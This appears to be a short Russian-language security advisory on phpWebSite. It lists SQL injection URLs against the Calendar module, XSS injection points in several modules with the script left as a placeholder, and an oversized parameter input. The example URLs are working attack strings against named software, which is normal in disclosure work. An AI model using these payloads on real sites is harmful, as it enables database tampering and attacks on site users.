Множественные уязвимости в phpWebSite

1. SQL инъекция. Уязвимость обнаружена в модуле 'Calendar'. Пример:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20 startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1

 
2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <= 20071205)) and active=1

2. XSS. Уязвимость в проверке правильности входных данных обнаружена в модулях 'Calendar', 'PageMaster', и 'Fatcat'. Пример:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?modu le=fatcat&fatcat[user]
=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?
module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
&MMN_position=[X:X]

http://[HOST]/[PATH]/index.php?
module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]

http://[target]/index.php?module=calendar&calendar[view]
=month&month=11&year=9

http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=
[VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )